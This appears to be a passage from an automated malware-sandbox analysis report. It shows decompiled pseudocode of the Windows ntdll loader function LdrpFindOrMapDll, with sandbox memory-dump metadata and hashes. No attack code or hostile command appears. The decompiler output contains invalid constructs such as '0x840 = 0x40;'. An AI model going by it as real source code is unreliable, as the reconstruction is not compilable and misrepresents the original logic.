                                  				E0259DF5C(__ebx, __edi, __esi);
                                  				_t254 =  *0x259f78c; // 0x8
                                  				_t416 =  *((intOrPtr*)(_t421 + 0xc));
                                  				if(( *0x26777a0 & (_t254 | 0x00000001)) != 0) {
                                  					_push(_t416);
                                  					E0260F970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
                                  					_t422 = _t422 + 0x1c;
                                  				}
                                  				_t257 =  *0x26777a0; // 0x0
                                  				if(( *0x259f790 & _t257) != 0) {
                                  					asm("int3");
                                  				}
                                  				_t410 = 0;
                                  				 *(_t421 - 0x24) = 0;
                                  				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
                                  				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
                                  				 *(_t421 - 0x28) = 0;
                                  				 *(_t421 + 0xf) = 0;
                                  				_t401 = 0;
                                  				if( *(_t421 + 0x18) != 0) {
                                  					_t258 = E0259FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                  					__eflags = _t258;
                                  					if(_t258 != 0) {
                                  						goto L13;
                                  					}
                                  					_t411 = E025B1A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
                                  					__eflags = _t411;
                                  					if(_t411 < 0) {
                                  						goto L14;
                                  					}
                                  					_t411 = E025B1AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
                                  					__eflags = _t411;
                                  					if(_t411 < 0) {
                                  						E0259E1C6(_t421 - 0x3c);
                                  						goto L14;
                                  					}
                                  					 *(_t421 - 0x24) = 0x10000000;
                                  					goto L84;
                                  				} else {
                                  					_t388 =  *(_t421 + 8);
                                  					_t402 = _t388[2];
                                  					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
                                  					while(_t390 >= _t402) {
                                  						_t406 =  *_t390 & 0x0000ffff;
                                  						if(_t406 == 0x5c || _t406 == 0x2f) {
                                  							 *(_t421 + 0xf) = 1;
                                  							break;
                                  						} else {
                                  							_t390 = _t390;
                                  							continue;
                                  						}
                                  					}
                                  					__eflags =  *(_t421 + 0xf);
                                  					if( *(_t421 + 0xf) == 0) {
                                  						_t391 = E0259FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
                                  						__eflags = _t391;
                                  						if(_t391 != 0) {
                                  							L13:
                                  							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                  							_t411 = 0;
                                  							__eflags = 0;
                                  							L14:
                                  							_t260 =  *0x259f798; // 0x8
                                  							_t261 = _t260 | 0x00000001;
                                  							__eflags =  *0x26777a0 & _t261;
                                  							if(( *0x26777a0 & _t261) != 0) {
                                  								E0260F970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
                                  							}
                                  							_t263 =  *0x26777a0; // 0x0
                                  							__eflags =  *0x259f79c & _t263;
                                  							if(( *0x259f79c & _t263) != 0) {
                                  								asm("int3");
                                  							}
                                  							return E0259DFA1(_t411);
                                  						}
                                  						_t411 = E025AFBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
                                  						__eflags = _t411;
                                  						if(_t411 < 0) {
                                  							__eflags = _t411 - 0xc0000135;
                                  							if(_t411 == 0xc0000135) {
                                  								_t410 = 0;
                                  								goto L10;
                                  							}
                                  							goto L14;
                                  						}
                                  						L19:
                                  						_t290 = E0259E893(_t421 - 0x48, 0x25aed64, 1);
                                  						__eflags = _t290;
                                  						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
                                  						_t411 = E025ABC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
                                  						_t401 = 0;
                                  						__eflags = _t411;
                                  						if(__eflags < 0) {
                                  							L29:
                                  							E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                  							__eflags =  *(_t421 - 0x28) - _t401;
                                  							if( *(_t421 - 0x28) == _t401) {
                                  								L32:
                                  								E0259E025(_t402,  *0x2670104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                  								goto L14;
                                  							}
                                  							L30:
                                  							E0258F9F0( *(_t421 - 0x28));
                                  							L31:
                                  							E0259E1C6(_t421 - 0x3c);
                                  							goto L32;
                                  						}
                                  						 *(_t421 + 0x18) = _t411;
                                  						_push(_t421 - 0x20);
                                  						_push(0);
                                  						_push( *((intOrPtr*)(_t421 - 0x54)));
                                  						_push( *((intOrPtr*)(_t421 - 0x1c)));
                                  						_push(0);
                                  						_t411 = E0259F535(_t411, _t416, __eflags);
                                  						__eflags = _t411;
                                  						if(_t411 < 0) {
                                  							L28:
                                  							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                  							E0258FC90(0xffffffff);
                                  							goto L29;
                                  						}
                                  						__eflags =  *(_t421 + 0xf);
                                  						if( *(_t421 + 0xf) != 0) {
                                  							_t299 = E025B1603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
                                  							__eflags = _t299;
                                  							if(_t299 == 0) {
                                  								goto L22;
                                  							}
                                  							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                  							_t411 = 0;
                                  							goto L28;
                                  						}
                                  						L22:
                                  						__eflags =  *0x26700d8 - 0x2000;
                                  						if( *0x26700d8 == 0x2000) {
                                  							_t402 = 0x10b;
                                  							_t300 =  *((intOrPtr*)(_t421 - 0x20));
                                  							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
                                  							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
                                  								goto L23;
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
                                  							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
                                  								goto L23;
                                  							}
                                  							_push(_t401);
                                  							_push(0x30);
                                  							_push(_t421 - 0xc4);
                                  							_push(1);
                                  							E02590060( *((intOrPtr*)(_t421 - 0x2c)));
                                  							__eflags =  *(_t421 - 0xa1) & 0x00000008;
                                  							if(__eflags == 0) {
                                  								goto L23;
                                  							}
                                  							 *(_t421 - 4) = _t401;
                                  							_t411 = E02615F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
                                  							 *(_t421 - 0x70) = _t411;
                                  							 *(_t421 - 4) = 0xfffffffe;
                                  							__eflags = _t411 - _t401;
                                  							if(_t411 >= _t401) {
                                  								goto L23;
                                  							} else {
                                  								goto L28;
                                  							}
                                  						}
                                  						L23:
                                  						_t417 = E0259F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
                                  						 *(_t421 - 0x58) = _t417;
                                  						__eflags = _t417 - _t401;
                                  						if(_t417 != _t401) {
                                  							__eflags =  *(_t417 + 0x10) & 0x00000001;
                                  							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
                                  								goto L24;
                                  							}
                                  							_t380 = E025C855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
                                  							_t411 = _t380;
                                  							__eflags = _t411 - _t401;
                                  							if(_t411 < _t401) {
                                  								goto L28;
                                  							} else {
                                  								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
                                  								 *(_t421 + 0x18) = _t380;
                                  								goto L24;
                                  							}
                                  							L73:
                                  							_t336 =  *(_t421 - 0x58);
                                  							__eflags =  *(_t336 + 0x10) & 0x00000001;
                                  							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
                                  								L45:
                                  								_t411 = 0;
                                  								E025AEF95(_t418, 1, 0);
                                  								E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                  								__eflags =  *(_t421 - 0x28);
                                  								if( *(_t421 - 0x28) != 0) {
                                  									E0258F9F0( *(_t421 - 0x28));
                                  									E0259E1C6(_t421 - 0x3c);
                                  								}
                                  								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
                                  								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
                                  								goto L14;
                                  							}
                                  							_t411 = E025C855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
                                  							__eflags = _t411;
                                  							if(_t411 < 0) {
                                  								E0259E025(_t402,  *0x2670104, 0, _t418);
                                  								_t401 = 0;
                                  								__eflags = 0;
                                  								L121:
                                  								__eflags =  *(_t421 - 0x24) & 0x00400000;
                                  								if(__eflags != 0) {
                                  									E02610010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
                                  								}
                                  								goto L28;
                                  							}
                                  							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
                                  							goto L45;
                                  						}
                                  						L24:
                                  						__eflags =  *(_t421 + 0x18) - 0x4000000e;
                                  						if(__eflags != 0) {
                                  							__eflags =  *(_t421 + 0x14) & 0x00800000;
                                  							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
                                  								L117:
                                  								_t303 =  *((intOrPtr*)(_t421 - 0x20));
                                  								L33:
                                  								_t402 = 0x2000;
                                  								__eflags =  *(_t303 + 0x16) & 0x00002000;
                                  								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
                                  									L35:
                                  									_t304 =  *0x2670058; // 0x0
                                  									_t418 = E0259E0C6( *0x2670104, _t304 + 0x40000, 0x78);
                                  									__eflags = _t418 - _t401;
                                  									if(_t418 == _t401) {
                                  										_t411 = 0xc0000017;
                                  										goto L121;
                                  									} else {
                                  										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
                                  										__eflags =  *(_t421 - 0x24) & 0x00000004;
                                  										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
                                  											 *(_t418 + 0x1c) = _t401;
                                  										} else {
                                  											_t347 =  *((intOrPtr*)(_t421 - 0x20));
                                  											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
                                  											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
                                  												_t348 = 0;
                                  											} else {
                                  												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
                                  												__eflags = _t348;
                                  											}
                                  											 *(_t418 + 0x1c) = _t348;
                                  										}
                                  										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
                                  										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
                                  										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
                                  										_t91 = _t418 + 0x2c; // 0x2c
                                  										_t401 = _t91;
                                  										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
                                  										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
                                  										 *(_t418 + 0x34) =  *(_t421 - 0x24);
                                  										 *((short*)(_t418 + 0x38)) = 0;
                                  										 *((short*)(_t418 + 0x3a)) = 0;
                                  										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
                                  										__eflags = 0;
                                  										 *((intOrPtr*)(_t418 + 0x48)) = 0;
                                  										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
                                  										_t104 = _t418 + 0x50; // 0x50
                                  										_t319 = _t104;
                                  										 *((intOrPtr*)(_t319 + 4)) = _t319;
                                  										 *_t319 = _t319;
                                  										_t106 = _t418 + 0x58; // 0x58
                                  										_t320 = _t106;
                                  										 *((intOrPtr*)(_t320 + 4)) = _t320;
                                  										 *_t320 = _t320;
                                  										_t108 = _t418 + 0x60; // 0x60
                                  										_t321 = _t108;
                                  										 *((intOrPtr*)(_t321 + 4)) = _t321;
                                  										 *_t321 = _t321;
                                  										 *((intOrPtr*)(_t418 + 0x68)) = 0;
                                  										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
                                  										_t324 =  *0x7ffe0018;
                                  										_t403 =  *0x7ffe0014;
                                  										_t407 =  *0x7ffe001c;
                                  										while(1) {
                                  											__eflags = _t324 - _t407;
                                  											if(_t324 == _t407) {
                                  												break;
                                  											}
                                  											asm("pause");
                                  											_t324 =  *0x7ffe0018;
                                  											_t403 =  *0x7ffe0014;
                                  											_t407 =  *0x7ffe001c;
                                  										}
                                  										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
                                  										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
                                  										_push(0);
                                  										_push(4);
                                  										_push(_t421 - 0x6c);
                                  										_push(2);
                                  										E02590060( *((intOrPtr*)(_t421 - 0x2c)));
                                  										_t328 =  *(_t421 - 0x6c);
                                  										__eflags = _t328;
                                  										if(_t328 != 0) {
                                  											_t119 = _t418 + 0x6c;
                                  											 *_t119 =  *(_t418 + 0x6c) - _t328;
                                  											__eflags =  *_t119;
                                  										}
                                  										_t121 = _t418 + 0x3c; // 0x3c
                                  										_t414 = _t121;
                                  										_t331 = 0x2674820 + (E0259FAC1(_t401) & 0x0000001f) * 8;
                                  										_t405 =  *((intOrPtr*)(_t331 + 4));
                                  										 *_t414 = _t331;
                                  										 *((intOrPtr*)(_t414 + 4)) = _t405;
                                  										 *_t405 = _t414;
                                  										 *((intOrPtr*)(_t331 + 4)) = _t414;
                                  										_t332 =  *0x2670210; // 0x737ce8
                                  										 *_t418 = 0x267020c;
                                  										 *((intOrPtr*)(_t418 + 4)) = _t332;
                                  										 *_t332 = _t418;
                                  										 *0x2670210 = _t418;
                                  										_t128 = _t418 + 8; // 0x8
                                  										_t333 = _t128;
                                  										_t402 =  *0x2670218; // 0x737cf0
                                  										 *_t333 = 0x2670214;
                                  										 *(_t333 + 4) = _t402;
                                  										 *_t402 = _t333;
                                  										 *0x2670218 = _t333;
                                  										E025B04F2(_t401, _t402, _t407, _t414, 0x2672200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
                                  										E025B02AC(_t402, _t418);
                                  										__eflags =  *(_t421 - 0x58);
                                  										if( *(_t421 - 0x58) != 0) {
                                  											goto L73;
                                  										} else {
                                  											goto L45;
                                  										}
                                  									}
                                  								}
                                  								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
                                  								__eflags =  *(_t421 + 0x18) - 0x40000003;
                                  								if( *(_t421 + 0x18) == 0x40000003) {
                                  									_t402 = _t421 - 0x34;
                                  									_t411 = E025EA0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
                                  									__eflags = _t411 - _t401;
                                  									if(_t411 >= _t401) {
                                  										goto L35;
                                  									}
                                  									goto L28;
                                  								}
                                  								goto L35;
                                  							}
                                  							__eflags =  *(_t421 + 0x14) & 0x00000002;
                                  							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
                                  								goto L117;
                                  							}
                                  							_t402 = 0x2000;
                                  							_t303 =  *((intOrPtr*)(_t421 - 0x20));
                                  							__eflags =  *(_t303 + 0x16) & 0x00002000;
                                  							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
                                  								L115:
                                  								__eflags =  *(_t303 + 0x5e) & 0x00000080;
                                  								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
                                  									goto L33;
                                  								}
                                  								_t411 = 0xc0000428;
                                  								goto L28;
                                  							}
                                  							__eflags = _t417 - _t401;
                                  							if(_t417 == _t401) {
                                  								goto L33;
                                  							}
                                  							__eflags =  *(_t417 + 0x10) & 0x00000001;
                                  							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
                                  								goto L33;
                                  							}
                                  							goto L115;
                                  						}
                                  						_push(_t421 - 0x68);
                                  						_push(_t401);
                                  						_push(_t401);
                                  						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
                                  						_push(3);
                                  						E0259F535(0x4000000e, _t417, __eflags);
                                  						_t355 =  *((intOrPtr*)(_t421 - 0x68));
                                  						__eflags =  *((short*)(_t355 + 0x48)) - 3;
                                  						if( *((short*)(_t355 + 0x48)) <= 3) {
                                  							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                  							_push(_t421 - 0x50);
                                  							_push(2);
                                  							_push(_t421 - 0x40);
                                  							_push(1);
                                  							_push(1);
                                  							_t411 = E02591614(0x4000000e);
                                  							__eflags = _t411 - _t401;
                                  							if(_t411 < _t401) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
                                  							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
                                  								goto L35;
                                  							}
                                  							__eflags =  *0x2670001;
                                  							if( *0x2670001 != 0) {
                                  								 *0x2679240 =  *0x2679240 + 1;
                                  							}
                                  							L27:
                                  							_t411 = 0xc000007b;
                                  							goto L28;
                                  						}
                                  						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
                                  						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
                                  							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                  							E0258FC90(0xffffffff);
                                  							E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                  							E0258F9F0( *(_t421 - 0x28));
                                  							E0259E1C6(_t421 - 0x3c);
                                  							_t410 = 0;
                                  							E0259E025(_t402,  *0x2670104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                  							_t401 = 1;
                                  							L11:
                                  							_t419 = E0259E825( *(_t421 + 8));
                                  							__eflags = _t419 - 2;
                                  							if(_t419 != 2) {
                                  								L54:
                                  								_t411 = E025B1C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
                                  								__eflags = _t411;
                                  								if(_t411 < 0) {
                                  									__eflags = _t411 - 0xc0000135;
                                  									if(_t411 == 0xc0000135) {
                                  										__eflags = _t401;
                                  										if(_t401 != 0) {
                                  											_t411 = 0xc000007b;
                                  										} else {
                                  											E025C7CC4( *(_t421 + 8));
                                  											L025B2D04(0xc0000135,  *(_t421 + 8), 0);
                                  										}
                                  									}
                                  									goto L14;
                                  								}
                                  								__eflags =  *(_t421 + 0xf);
                                  								if( *(_t421 + 0xf) == 0) {
                                  									L84:
                                  									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
                                  									_t416 = 0;
                                  									 *((intOrPtr*)(_t421 - 0x84)) = 0;
                                  									0x840 = 0x40;
                                  									__eflags =  *0x267924c;
                                  									if( *0x267924c == 0) {
                                  									}
                                  									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
                                  									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
                                  									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
                                  									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
                                  									_push(0x60);
                                  									_push(5);
                                  									_push(_t421 - 0x94);
                                  									_push(_t421 - 0x88);
                                  									_push(0x100021);
                                  									_t411 = L0258FD74(_t421 - 0x28);
                                  									__eflags = _t411 - _t416;
                                  									if(_t411 < _t416) {
                                  										__eflags = _t411 - 0xc0000034;
                                  										if(_t411 == 0xc0000034) {
                                  											L88:
                                  											_t411 = 0xc0000135;
                                  											goto L31;
                                  										}
                                  										__eflags = _t411 - 0xc000003a;
                                  										if(_t411 != 0xc000003a) {
                                  											goto L31;
                                  										}
                                  										goto L88;
                                  									} else {
                                  										_push( *(_t421 - 0x28));
                                  										_push(0x1000000);
                                  										_push(0x10);
                                  										_push(_t416);
                                  										_push(_t416);
                                  										_push(0xf);
                                  										_t411 = E0258FFB4(_t421 - 0x2c);
                                  										__eflags = _t411 - _t416;
                                  										if(_t411 < _t416) {
                                  											__eflags = _t411 - 0xc0000017;
                                  											if(_t411 != 0xc0000017) {
                                  												__eflags = _t411 - 0xc000009a;
                                  												if(_t411 != 0xc000009a) {
                                  													__eflags = _t411 - 0xc000012d;
                                  													if(_t411 != 0xc000012d) {
                                  														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                  														_push(_t421 - 0x50);
                                  														_push(1);
                                  														_push(_t421 - 0x40);
                                  														_push(1);
                                  														_push(1);
                                  														_t288 = E02591614(0xc000007b);
                                  														__eflags = _t288;
                                  														if(_t288 >= 0) {
                                  															__eflags =  *0x2670001;
                                  															if( *0x2670001 != 0) {
                                  																 *0x2679240 =  *0x2679240 + 1;
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L30;
                                  										}
                                  										__eflags =  *(_t421 + 0x14) & 0x00001000;
                                  										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
                                  											goto L19;
                                  										}
                                  										_t411 = L025B1D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
                                  										__eflags = _t411;
                                  										if(_t411 >= 0) {
                                  											goto L19;
                                  										}
                                  										__eflags = _t411 - 0xc0000225;
                                  										if(_t411 == 0xc0000225) {
                                  											goto L19;
                                  										} else {
                                  											_t401 = 0;
                                  											goto L29;
                                  										}
                                  										goto L54;
                                  									}
                                  								}
                                  								__eflags = _t419 - 2;
                                  								if(_t419 == 2) {
                                  									goto L84;
                                  								}
                                  								_t376 = E0259FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
                                  								__eflags = _t376;
                                  								if(_t376 == 0) {
                                  									goto L84;
                                  								}
                                  								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                  								_t411 = 0;
                                  								goto L31;
                                  							}
                                  							_t378 = E0259FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                  							__eflags = _t378;
                                  							if(_t378 == 0) {
                                  								goto L54;
                                  							}
                                  							goto L13;
                                  						}
                                  						goto L27;
                                  					}
                                  					L10:
                                  					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
                                  					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
                                  					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
                                  					goto L11;
                                  				}
                                  			}
















































                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$Status: 0x%08lx$X&q$`&q$d:\w7rtm\minkernel\ntdll\ldrfind.c$|s
                                  • API String ID: 0-4165998036
                                  • Opcode ID: d9b2187a3e5eee20e636c3fbe757ac52541e69788af22f4bb4855cf1ef26cfed
                                  • Instruction ID: 910a93a58e24093f03e856af9e6f3377de44bca5e3b224f23a877a210f76fd4a
                                  • Opcode Fuzzy Hash: d9b2187a3e5eee20e636c3fbe757ac52541e69788af22f4bb4855cf1ef26cfed
                                  • Instruction Fuzzy Hash: AE329B71800249AFDF22DFA4C891BEEBBFAFF48304F14442AE945A7260D7719985CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0259F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
                                  				signed int _v8;
                                  				short _v12;
                                  				short _v24;
                                  				intOrPtr _v28;
                                  				short* _v32;
                                  				short* _v36;
                                  				short* _v40;
                                  				short _v42;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed short _v56;
                                  				signed int _v60;
                                  				signed short _v64;
                                  				signed int _v68;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				signed char* _v84;
                                  				signed int _v88;
                                  				char _v92;
                                  				signed int _v116;
                                  				intOrPtr _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr _v128;
                                  				intOrPtr _v132;
                                  				intOrPtr _v144;
                                  				intOrPtr _v148;
                                  				char _v152;
                                  				char _v156;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				signed int _t186;
                                  				short _t194;
                                  				short* _t196;
                                  				intOrPtr _t205;
                                  				signed char* _t206;
                                  				signed char _t207;
                                  				signed int _t209;
                                  				signed short* _t210;
                                  				void* _t214;
                                  				signed int _t215;
                                  				signed int _t219;
                                  				void* _t221;
                                  				signed int _t223;
                                  				signed short _t227;
                                  				signed char _t232;
                                  				void* _t237;
                                  				signed int _t238;
                                  				signed short _t242;
                                  				signed int _t245;
                                  				signed int _t254;
                                  				void* _t255;
                                  				signed int _t256;
                                  				signed short _t260;
                                  				void* _t266;
                                  				signed int _t267;
                                  				signed int _t271;
                                  				signed short* _t282;
                                  				signed int _t283;
                                  				signed int _t287;
                                  				signed int _t288;
                                  				signed int _t291;
                                  				intOrPtr* _t296;
                                  				intOrPtr _t297;
                                  				signed int _t299;
                                  				signed int* _t300;
                                  				signed short _t304;
                                  				char* _t337;
                                  				signed int* _t342;
                                  				signed int _t345;
                                  				signed short* _t347;
                                  				signed int _t348;
                                  				void* _t349;
                                  				void* _t350;
                                  
                                  				_t347 = __esi;
                                  				_t186 =  *0x2672088; // 0x77fdf0e4
                                  				_v8 = _t186 ^ _t348;
                                  				_v88 = _a8;
                                  				_t345 = __edx;
                                  				_t282 = __ecx;
                                  				_v56 = __edx;
                                  				_v156 = 0x40;
                                  				E0259DFC0( &_v152, 0, 0x3c);
                                  				_t350 = _t349 + 0xc;
                                  				_v68 =  *_t282;
                                  				_v64 = _t282[2];
                                  				_t337 =  &_v12;
                                  				_v32 = _t337;
                                  				_v40 = _t337;
                                  				_v36 =  &_v12;
                                  				_t194 = 2;
                                  				_v12 = 0;
                                  				_v44 = 0;
                                  				_v42 = _t194;
                                  				_t341 =  &_v68;
                                  				_v72 = 0;
                                  				_v60 = 0;
                                  				_v28 = _t194;
                                  				_v24 = _t194;
                                  				_t283 = L0259ED18(3, 0, _t194,  &_v68,  &_v156);
                                  				if(_t283 >= 0) {
                                  					__eflags = _a4;
                                  					if(_a4 != 0) {
                                  						L44:
                                  						_t283 = 0;
                                  						L2:
                                  						_t291 = _v36;
                                  						_t196 = _v32;
                                  						if(_t291 != 0) {
                                  							if(_t291 != _t196) {
                                  								_v88 = _t291;
                                  								E0259E1C6( &_v92);
                                  								_t196 = _v32;
                                  							}
                                  							_v36 = _t196;
                                  							_v28 = _v24;
                                  						}
                                  						_v40 = _t196;
                                  						if(_t196 != 0) {
                                  							 *_t196 = 0;
                                  						}
                                  						_v44 = 0;
                                  						_t198 = _v24;
                                  						_v42 = _v24;
                                  						if(_v72 != 0) {
                                  							E025AB90D(_t198, _v72);
                                  						}
                                  						return E0259E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
                                  					}
                                  					__eflags = _v144 - 0x14;
                                  					_v72 = _v124;
                                  					if(_v144 < 0x14) {
                                  						L48:
                                  						_t283 = 0xc0150003;
                                  						goto L2;
                                  					}
                                  					__eflags = _v152 - 1;
                                  					if(_v152 != 1) {
                                  						goto L48;
                                  					}
                                  					_t205 = _v148;
                                  					_t296 = _t205 + 0x10;
                                  					_v52 = _t296;
                                  					_t297 =  *_t296;
                                  					__eflags = _t297 - _v128;
                                  					if(_t297 > _v128) {
                                  						goto L48;
                                  					}
                                  					_t342 = _t205 + 0xc;
                                  					_v76 = _t342;
                                  					_t341 =  *_t342;
                                  					__eflags = _t341 - 0x1fffffff;
                                  					if(_t341 > 0x1fffffff) {
                                  						goto L48;
                                  					}
                                  					_t341 = _t341 << 3;
                                  					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
                                  					if(_t297 > (_t283 | 0xffffffff) - _t341) {
                                  						goto L48;
                                  					}
                                  					_t341 = _t341 + _t297;
                                  					__eflags = _t341 - _v128;
                                  					if(_t341 > _v128) {
                                  						goto L48;
                                  					}
                                  					_t206 = _t205 + 4;
                                  					_v84 = _t206;
                                  					_t207 =  *_t206;
                                  					__eflags = _t207 & 0x00000002;
                                  					if((_t207 & 0x00000002) == 0) {
                                  						L22:
                                  						_t287 =  *_v52 + _v132;
                                  						_t209 = 0;
                                  						 *_t345 = 0;
                                  						_t299 =  *_v76;
                                  						_v52 = _t299;
                                  						__eflags = _t299;
                                  						while(1) {
                                  							_v48 = _t209;
                                  							if(__eflags == 0) {
                                  								break;
                                  							}
                                  							_t300 = _t287 + 4 + _t209 * 8;
                                  							_t341 =  *_t300;
                                  							_v76 = _t341;
                                  							__eflags = _t341 - _v128;
                                  							if(_t341 > _v128) {
                                  								goto L48;
                                  							}
                                  							_t210 = _t287 + _t209 * 8;
                                  							_t341 = (_t341 | 0xffffffff) -  *_t210;
